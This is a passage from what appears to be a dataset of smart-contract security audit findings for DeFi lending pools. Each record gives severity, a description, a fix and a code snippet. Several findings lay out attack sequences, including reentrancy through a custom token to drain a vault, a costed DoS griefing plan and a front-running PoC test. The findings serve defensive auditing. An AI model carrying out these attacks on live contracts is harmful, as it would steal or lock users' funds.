inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n} else if (poolState_.debt == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\n\\nThe problem here is that since there was no debt at the start of the function, `poolState_.isNewInterestAccrued` is false and since there is debt now at the end of the function, `poolState_.debt == 0` is also false. As a result, the inflator is not updated. Updating the inflator here is paramount since it effectively marks a starting time at which interest accrues on the borrowers debt. Since we don't update the inflator, the borrowers debt effectively started accruing interest at the time of the last inflator update, which is an arbitrary duration.\\nWe can prove this vulnerability by modifying `ERC20PoolBorrow.t.sol:testPoolBorrowAndRepay` to skip 100 days before initially drawing debt:\\n```\\nfunction testPoolBorrowAndRepay() external tearDown {\\n // check balances before borrow\\n assertEq(_quote.balanceOf(address(_pool)), 50_000 * 1e18);\\n assertEq(_quote.balanceOf(_lender), 150_000 * 1e18);\\n\\n // @audit skip 100 days to break test\\n skip(100 days);\\n\\n _drawDebt({\\n from: _borrower,\\n borrower: _borrower,\\n amountToBorrow: 21_000 * 1e18,\\n limitIndex: 3_000,\\n collateralToPledge: 100 * 1e18,\\n newLup: 2_981.007422784467321543 * 1e18\\n });\\n\\n // rest of code\\n}\\n```\\n\\nUnlike the result without skipping time before drawing debt, the test fails with output logs being off by amounts roughly corresponding to the unexpected interest.чIssue First pool borrower pays extra interest\\nWhen checking whether the debt of the pool is 0 to determine whether to reset the inflator, it should not only check whether the debt is 0 at the end of execution, but also whether the debt was 0 before execution. To do so, we should cache the debt at the start of the function and modify the `_updateInterestState` logic to be something like:\\n```\\n// update pool inflator\\nif (poolState_.isNewInterestAccrued) {\\n inflatorState.inflator = uint208(poolState_.inflator);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n// if the debt in the current pool state is 0, also update the inflator and inflatorUpdate fields in inflatorState\\n// slither-disable-next-line incorrect-equality\\n// @audit reset inflator if no debt before execution\\n} else if (poolState_.debt == 0 || debtBeforeExecution == 0) {\\n inflatorState.inflator = uint208(Maths.WAD);\\n inflatorState.inflatorUpdate = uint48(block.timestamp);\\n}\\n```\\nчFirst borrower always pays extra interest, with losses depending upon time between adding liquidity and drawing debt and amount of debt drawn.\\nNote also that there's an attack vector here in which the liquidity provider can intentionally create and fund the pool a long time before announcing it, causing the initial borrower to lose a significant amount to interest.ч```\\nfunction drawDebt(\\n address borrowerAddress_,\\n uint256 amountToBorrow_,\\n uint256 limitIndex_,\\n uint256 collateralToPledge_\\n) external nonReentrant {\\n PoolState memory poolState = _accruePoolInterest();\\n\\n // rest of code\\n\\n DrawDebtResult memory result = BorrowerActions.drawDebt(\\n auctions,\\n deposits,\\n loans,\\n poolState,\\n _availableQuoteToken(),\\n borrowerAddress_,\\n amountToBorrow_,\\n limitIndex_,\\n collateralToPledge_\\n );\\n\\n // rest of code\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, result.newLup);\\n\\n // rest of code\\n}\\n```\\n -Function `_indexOf` will cause a settlement to revert if `auctionPrice > MAX_PRICE`чmediumчIn ERC721 pools, when a settlement occurs and the borrower still have some fraction of collateral, that fraction is allocated in the bucket with a price closest to `auctionPrice` and the borrower is proportionally compensated with LPB in that bucket.\\nIn order to calculate the index of the bucket closest in price to `auctionPrice`, the `_indexOf` function is called. The first line of that function is outlined below:\\n```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n\\nThe `_indexOf` function will revert if `price_` (provided as an argument) is below `MIN_PRICE` or above `MAX_PRICE`. This function is called from `_settleAuction`, here is a snippet of that:\\n```\\nfunction _settleAuction(\\n AuctionsState storage auctions_,\\n mapping(uint256 => Bucket) storage buckets_,\\n DepositsState storage deposits_,\\n address borrowerAddress_,\\n uint256 borrowerCollateral_,\\n uint256 poolType_\\n) internal returns (uint256 remainingCollateral_, uint256 compensatedCollateral_) {\\n\\n // // rest of code\\n\\n uint256 auctionPrice = _auctionPrice(\\n auctions_.liquidations[borrowerAddress_].referencePrice,\\n auctions_.liquidations[borrowerAddress_].kickTime\\n );\\n\\n // determine the bucket index to compensate fractional collateral\\n> bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n\\n // // rest of code\\n}\\n```\\n\\nThe `_settleAuction` function first calculates the `auctionPrice` and then it gets the index of the bucket with a price closest to `bucketPrice`. If `auctionPrice` results to be bigger than `MAX_PRICE`, then the `_indexOf` function will revert and the entire settlement will fail.\\nIn certain types of pools where one asset has an extremely low market price and the other is valued really high, the resulting prices at an auction can be so high that is not rare to see an `auctionPrice > MAX_PRICE`.\\nThe `auctionPrice` variable is computed from `referencePrice` and it goes lower through time until 72 hours have passed. Also, `referencePrice` can be much higher than `MAX_PRICE`, as outline in _kick:\\n```\\nvars.referencePrice = Maths.min(Maths.max(vars.htp, vars.neutralPrice), MAX_INFLATED_PRICE);\\n```\\n\\nThe value of `MAX_INFLATED_PRICE` is exactly 50 * `MAX_PRICE` so a `referencePrice` bigger than `MAX_PRICE` is totally possible.\\nIn auctions where `referencePrice` is bigger than `MAX_PRICE` and the auction is settled in a low time frame, `auctionPrice` will be also bigger than `MAX_PRICE` and that will cause the entire transaction to revert.чIt's recommended to change the affected line of `_settleAuction` in the following way:\\n```\\n// Remove the line below\\n bucketIndex = auctionPrice > MIN_PRICE ? _indexOf(auctionPrice) : MAX_FENWICK_INDEX;\\n// Add the line below\\n if(auctionPrice < MIN_PRICE){\\n// Add the line below\\n bucketIndex = MAX_FENWICK_INDEX;\\n// Add the line below\\n } else if (auctionPrice > MAX_PRICE) {\\n// Add the line below\\n bucketIndex = 1;\\n// Add the line below\\n } else {\\n// Add the line below\\n bucketIndex = _indexOf(auctionPrice);\\n// Add the line below\\n }\\n```\\nчWhen the above conditions are met, the auction won't be able to settle until `auctionPrice` lowers below `MAX_PRICE`.\\nIn ERC721 pools with a high difference in assets valuation, there is no low-probability prerequisites and the impact will be a violation of the system design, as well as the potential losses for the kicker of that auction, so setting severity to be highч```\\nif (price_ < MIN_PRICE || price_ > MAX_PRICE) revert BucketPriceOutOfBounds();\\n```\\n -Adversary can reenter takeOverDebt() during liquidation to steal vault fundsчhighчFirst we'll walk through a high level breakdown of the issue to have as context for the rest of the report:\\nCreate a custom token that allows them to take control of the transaction and to prevent liquidation\\nFund UniV3 LP with target token and custom token\\nBorrow against LP with target token as the hold token\\nAfter some time the position become liquidatable\\nBegin liquidating the position via repay()\\nUtilize the custom token during the swap in repay() to gain control of the transaction\\nUse control to reenter into takeOverDebt() since it lack nonReentrant modifier\\nLoan is now open on a secondary address and closed on the initial one\\nTransaction resumes (post swap) on repay()\\nFinish repayment and refund all initial LP\\nPosition is still exists on new address\\nAfter some time the position become liquidatable\\nLoan is liquidated and attacker is paid more LP\\nVault is at a deficit due to refunding LP twice\\nRepeat until the vault is drained of target token\\nLiquidityManager.sol#L279-L287\\n```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n\\nThe control transfer happens during the swap to UniV3. Here when the custom token is transferred, it gives control back to the attacker which can be used to call takeOverDebt().\\nLiquidityBorrowingManager.sol#L667-L672\\n```\\n _removeKeysAndClearStorage(borrowing.borrower, params.borrowingKey, loans);\\n // Pay a profit to a msg.sender\\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\\n\\n emit Repay(borrowing.borrower, msg.sender, params.borrowingKey);\\n```\\n\\nThe reason the reentrancy works is because the actual borrowing storage state isn't modified until AFTER the control transfer. This means that the position state is fully intact for the takeOverDebt() call, allowing it to seamlessly transfer to another address behaving completely normally. After the repay() call resumes, _removeKeysAndClearStorage is called with the now deleted borrowKey.\\nKeys.sol#L31-L42\\n```\\nfunction removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nThe unique characteristic of deleteKey is that it doesn't revert if the key doesn't exist. This allows \"removing\" keys from an empty array without reverting. This allows the repay call to finish successfully.\\nLiquidityBorrowingManager.sol#L450-L452\\n```\\n //newBorrowing.accLoanRatePerSeconds = oldBorrowing.accLoanRatePerSeconds;\\n _pay(oldBorrowing.holdToken, msg.sender, VAULT_ADDRESS, collateralAmt + feesDebt);\\n emit TakeOverDebt(oldBorrowing.borrower, msg.sender, borrowingKey, newBorrowingKey);\\n```\\n\\nNow we can see how this creates a deficit in the vault. When taking over an existing debt, the user is only required to provide enough hold token to cover any fee debt and any additional collateral to pay fees for the newly transferred position. This means that the user isn't providing any hold token to back existing LP.\\nLiquidityBorrowingManager.sol#L632-L636\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nOn the other hand repay transfers the LP backing funds from the vault. Since the same position is effectively liquidated twice, it will withdraw twice as much hold token as was originally deposited and no new LP funds are added when the position is taken over. This causes a deficit in the vault since other users funds are being withdrawn from the vault.чAdd the `nonReentrant` modifier to `takeOverDebt()`чVault can be drainedч```\\n_v3SwapExactInput(\\n v3SwapExactInputParams({\\n fee: params.fee,\\n tokenIn: cache.holdToken,\\n tokenOut: cache.saleToken,\\n amountIn: holdTokenAmountIn,\\n amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) /\\n Constants.BPS\\n })\\n```\\n -Creditor can maliciously burn UniV3 position to permanently lock fundsчhighчNonfungiblePositionManager\\n```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, \"ERC721: owner query for nonexistent token\");\\n}\\n```\\n\\nWhen querying a nonexistent token, ownerOf will revert. Now assuming the NFT is burnt we can see how every method for repayment is now lost.\\nLiquidityManager.sol#L306-L308\\n```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n```\\n\\nIf the user is being liquidated or repaying themselves the above lines are called for each loan. This causes all calls of this nature to revert.\\nLiquidityBorrowingManager.sol#L727-L732\\n```\\n for (uint256 i; i < loans.length; ) {\\n LoanInfo memory loan = loans[i];\\n // Get the owner address of the loan's token ID using the underlyingPositionManager contract.\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Check if the owner of the loan's token ID is equal to the `msg.sender`.\\n if (creditor == msg.sender) {\\n```\\n\\nThe only other option to recover funds would be for each of the other lenders to call for an emergency withdrawal. The problem is that this pathway will also always revert. It cycles through each loan causing it to query ownerOf() for each token. As we know this reverts. The final result is that once this happens, there is no way possible to close the position.чI would recommend storing each initial creditor when a loan is opened. Add try-catch blocks to each `ownerOf()` call. If the call reverts then use the initial creditor, otherwise use the current owner.чCreditor can maliciously lock all fundsч```\\nfunction ownerOf(uint256 tokenId) public view virtual override returns (address) {\\n return _tokenOwners.get(tokenId, \"ERC721: owner query for nonexistent token\");\\n}\\n```\\n -No slippage protection during repayment due to dynamic slippage params and easily influenced `slot0()`чhighчThe absence of slippage protection can be attributed to two key reasons. Firstly, the `sqrtPrice` is derived from `slot0()`, which can be easily manipulated:\\n```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n\\nThe calculated `sqrtPriceX96` is used to determine the amounts for restoring liquidation and the number of holdTokens to be swapped for saleTokens:\\n```\\n(uint256 holdTokenAmountIn, uint256 amount0, uint256 amount1) = _getHoldTokenAmountIn(\\n params.zeroForSaleToken,\\n cache.tickLower,\\n cache.tickUpper,\\n cache.sqrtPriceX96,\\n loan.liquidity,\\n cache.holdTokenDebt\\n );\\n```\\n\\nAfter that, the number of `SaleTokemAmountOut` is gained based on the sqrtPrice via QuoterV2.\\nThen, the slippage params are calculated `amountOutMinimum: (saleTokenAmountOut * params.slippageBP1000) / Constants.BPS })` However, the `saleTokenAmountOut` is a dynamic number calculated on the current state of the blockchain, based on the calculations mentioned above. This will lead to the situation that the swap will always satisfy the `amountOutMinimum`.\\nAs a result, if the repayment of the user is sandwiched (frontrunned), the profit of the repayer is decreased till the repayment satisfies the restored liquidity.\\nA Proof of Concept (PoC) demonstrates the issue with comments. Although the swap does not significantly impact a strongly founded pool, it does result in a loss of a few dollars for the repayer.\\n```\\n let amountWBTC = ethers.utils.parseUnits(\"0.05\", 8); //token0\\n const deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\nlet params = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\nawait borrowingManager.connect(bob).borrow(params, deadline);\\n\\nconst borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n const swapParamsRep: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n \\n amountWBTC = ethers.utils.parseUnits(\"0.06\", 8); //token0\\n\\nlet swapping: ISwapRouter.ExactInputSingleParamsStruct = {\\n tokenIn: WBTC_ADDRESS,\\n tokenOut: WETH_ADDRESS,\\n fee: 500,\\n recipient: alice.address,\\n deadline: deadline,\\n amountIn: ethers.utils.parseUnits(\"100\", 8),\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n };\\n await router.connect(alice).exactInputSingle(swapping);\\n console.log(\"Swap success\");\\n\\n let paramsRep: LiquidityBorrowingManager.RepayParamsStruct = {\\n isEmergency: false,\\n internalSwapPoolfee: 500,\\n externalSwap: swapParamsRep,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 990, //<=slippage simulated\\n };\\n await borrowingManager.connect(bob).repay(paramsRep, deadline);\\n // Without swap\\n// Balance of hold token after repay: BigNumber { value: \"993951415\" }\\n// Balance of sale token after repay: BigNumber { value: \"99005137946252426108\" }\\n// When swap\\n// Balance of hold token after repay: BigNumber { value: \"993951415\" }\\n// Balance of sale token after repay: BigNumber { value: \"99000233164653177505\" }\\n```\\n\\nThe following table shows difference of recieved sale token:\\nSwap before repay transaction Token Balance of user after Repay\\nNo WETH 99005137946252426108\\nYes WETH 99000233164653177505\\nThe difference in the profit after repayment is 4904781599248603 weis, which is at the current market price of around 8 USD. The profit loss will depend on the liquidity in the pool, which depends on the type of pool and related tokens.чTo address this issue, avoid relying on slot0 and instead utilize Uniswap TWAP. Additionally, consider manually setting values for amountOutMin for swaps based on data acquired before repayment.чThe absence of slippage protection results in potential profit loss for the repayer.ч```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n -DoS of lenders and gas griefing by packing tokenIdToBorrowingKeys arraysчmediumч`LiquidityBorrowingManager.borrow()` calls the function `_addKeysAndLoansInfo()`, which adds user keys to the `tokenIdToBorrowingKeys` array of the borrowed-from LP position:\\n```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n\\nA user key is calculated in the `Keys` library like so:\\n```\\n function computeBorrowingKey(\\n address borrower,\\n address saleToken,\\n address holdToken\\n ) internal pure returns (bytes32) {\\n return keccak256(abi.encodePacked(borrower, saleToken, holdToken));\\n }\\n```\\n\\n```\\n function addKeyIfNotExists(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n return;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n self.push(key);\\n }\\n\\n function removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nLet's give an example to see the potential impact and cost of the attack:\\nAn LP provider authorizes the contract to give loans from their large position. Let's say USDC/WETH pool.\\nThe attacker sees this and takes out minimum borrows of USDC using different addresses to pack the position's `tokenIdToBorrowingKeys` array. In `Constants.sol`, `MINIMUM_BORROWED_AMOUNT = 100000` so the minimum borrow is $0.1 dollars since USDC has 6 decimal places. Add this to the estimated gas cost of the borrow transaction, let's say $3.9 dollars. The cost to add one key to the array is approx. $4. The max block gas limit on ethereum mainnet is `30,000,000`, so divide that by 2000 gas, the approximate gas increase for one key added to the array. The result is 15,000, therefore the attacker can spend 60000 dollars to make any new borrows from the LP position unable to be repaid, transferred, or liquidated. Any new borrow will be stuck in the contract.\\nThe attacker now takes out a high leverage borrow on the LP position, for example $20,000 in collateral for a $1,000,000 borrow. The attacker's total expenditure is now $80,000, and the $1,000,000 from the LP is now locked in the contract for an arbitrary period of time.\\nThe attacker calls `increaseCollateralBalance()` on all of the spam positions. Default daily rate is .1% (max 1%), so over a year the attacker must pay 36.5% of each spam borrow amount to avoid liquidation and shortening of the array. If the gas cost of increasing collateral is $0.5 dollars, and the attacker spends another $0.5 dollars to increase collateral for each spam borrow, then the attacker can spend $1 on each spam borrow and keep them safe from liquidation for over 10 years for a cost of $15,000 dollars. The total attack expenditure is now $95,000. The protocol cannot easily increase the rate to hurt the attacker, because that would increase the rate for all users in the USDC/WETH market. Furthermore, the cost of the attack will not increase that much even if the daily rate is increased to the max of 1%. The attacker does not need to increase the collateral balance of the $1,000,000 borrow since repaying that borrow is DoSed.\\nThe result is that $1,000,000 of the loaner's liquidity is locked in the contract for over 10 years for an attack cost of $95,000.ч`tokenIdToBorrowingKeys` tracks borrowing keys and is used in view functions to return info (getLenderCreditsCount() and getLenderCreditsInfo()). This functionality is easier to implement with arrays, but it can be done with mappings to reduce gas costs and prevent gas griefing and DoS attacks. For example the protocol can emit the borrows for all LP tokens and keep track of them offchain, and pass borrow IDs in an array to a view function to look them up in the mapping. Alternatively, OpenZeppelin's EnumerableSet library could be used to replace the array and keep track of all the borrows on-chain.чArray packing causes users to spend more gas on loans of the affected LP token. User transactions may out-of-gas revert due to increased gas costs. An attacker can lock liquidity from LPs in the contract for arbitrary periods of time for asymmetric cost favoring the attacker. The LP will earn very little fees over the period of the DoS.ч```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n -Adversary can overwrite function selector in _patchAmountAndCall due to inline assembly lack of overflow protectionчmediumч`The use of YUL or inline assembly in a solidity smart contract also makes integer overflow/ underflow possible even if the compiler version of solidity is 0.8. In YUL programming language, integer underflow & overflow is possible in the same way as Solidity and it does not check automatically for it as YUL is a low-level language that is mostly used for making the code more optimized, which does this by omitting many opcodes. Because of its low-level nature, YUL does not perform many security checks therefore it is recommended to use as little of it as possible in your smart contracts.`\\nSource\\nInline assembly lacks overflow/underflow protections, which opens the possibility of this exploit.\\nExternalCall.sol#L27-L38\\n```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n\\nIn the code above we see that `swapAmountInDataValue` is stored at `ptr + 36 (0x24) + swapAmountInDataIndex * 32 (0x20)`. The addition of 36 (0x24) in this scenario should prevent the function selector from being overwritten because of the extra 4 bytes (using 36 instead of 32). This is not the case though because `mul(swapAmountInDataIndex, 0x20)` can overflow since it is a uint256. This allows the attacker to target any part of the memory they choose by selectively overflowing to make it write to the desired position.\\nAs shown above, overwriting the function selector is possible although most of the time this value would be a complete nonsense since swapAmountInDataValue is calculated elsewhere and isn't user supplied. This also has a work around. By creating their own token and adding it as LP to a UniV3 pool, swapAmountInDataValue can be carefully manipulated to any value. This allows the attacker to selectively overwrite the function selector with any value they chose. This bypasses function selectors restrictions and opens calls to dangerous functions.чLimit `swapAmountInDataIndex` to a reasonable value such as uint128.max, preventing any overflow.чAttacker can bypass function restrictions and call dangerous/unintended functionsч```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n -Blacklisted creditor can block all repayment besides emergency closureчmediumч```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n\\nThe following code is executed for each loan when attempting to repay. Here we see that each creditor is directly transferred their tokens from the vault. If the creditor is blacklisted for holdToken, then the transfer will revert. This will cause all repayments to revert, preventing the user from ever repaying their loan and forcing them to default.чCreate an escrow to hold funds in the event that the creditor cannot receive their funds. Implement a try-catch block around the transfer to the creditor. If it fails then send the funds instead to an escrow account, allowing the creditor to claim their tokens later and for the transaction to complete.чBorrowers with blacklisted creditors are forced to defaultч```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n -Incorrect calculations of borrowingCollateral leads to DoS for positions in the current tick range due to underflowчmediumчThis calculation is most likely to underflow\\n```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n\\nThe `cache.borrowedAmount` is the calculated amount of holdTokens based on the liquidity of a position. `cache.holdTokenBalance` is the balance of holdTokens queried after liquidity extraction and tokens transferred to the `LiquidityBorrowingManager`. If any amounts of the saleToken are transferred as well, these are swapped to holdTokens and added to `cache.holdTokenBalance`.\\nSo in case when liquidity of a position is in the current tick range, both tokens would be transferred to the contract and saleToken would be swapped for holdToken and then added to `cache.holdTokenBalance`. This would make `cache.holdTokenBalance > cache.borrowedAmount` since `cache.holdTokenBalance == cache.borrowedAmount + amount of sale token swapped` and would make the tx revert due to underflow.чThe borrowedAmount should be subtracted from holdTokenBalance\\n```\\nuint256 borrowingCollateral = cache.holdTokenBalance - cache.borrowedAmount;\\n```\\nчMany positions would be unavailable to borrowers. For non-volatile positions like that which provide liquidity to stablecoin pools the DoS could last for very long period. For volatile positions that provide liquidity in a wide range this could also be for more than 1 year.ч```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n -Wrong `accLoanRatePerSeconds` in `repay()` can lead to underflowчmediumчBecause the `repay()` function resets the `dailyRateCollateralBalance` to 0 when the lender call didn't fully close the position. We want to be able to compute the missing collateral again.\\nTo do so we substract the percentage of collateral not paid to the `accLoanRatePerSeconds` so on the next call we will be adding extra second of fees that will allow the contract to compute the missing collateral.\\nThe problem lies in the fact that we compute a percentage using the borrowed amount left instead of the initial borrow amount causing the percentage to be higher. In practice this do allows the contract to recompute the missing collateral.\\nBut in the case of the missing `collateralBalance` or `removedAmt` being very high (ex: multiple days not paid or the loan removed was most of the position's liquidity) we might end up with a percentage higher than the `accLoanRatePerSeconds` which will cause an underflow.\\nIn case of an underflow the call will revert and the lender will not be able to get his tokens back.\\nConsider this POC that can be copied and pasted in the test files (replace all tests and just keep the setup & NFT creation):\\n```\\nit(\"Updated accRate is incorrect\", async () => {\\n const amountWBTC = ethers.utils.parseUnits(\"0.05\", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\nчConsider that when a lender do an emergency liquidity restoration they give up on their collateral missing and so use the initial amount in the computation instead of borrowed amount left.\\n```\\nborrowingStorage.accLoanRatePerSeconds =\\n holdTokenRateInfo.accLoanRatePerSeconds -\\n FullMath.mulDiv(\\n uint256(-collateralBalance),\\n Constants.BP,\\n borrowing.borrowedAmount + removedAmt //old amount\\n );\\n```\\nчMedium. Lender might not be able to use `isEmergency` on `repay()` and will have to do a normal liquidation if he want his liquidity back.ч```\\nit(\"Updated accRate is incorrect\", async () => {\\n const amountWBTC = ethers.utils.parseUnits(\"0.05\", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: 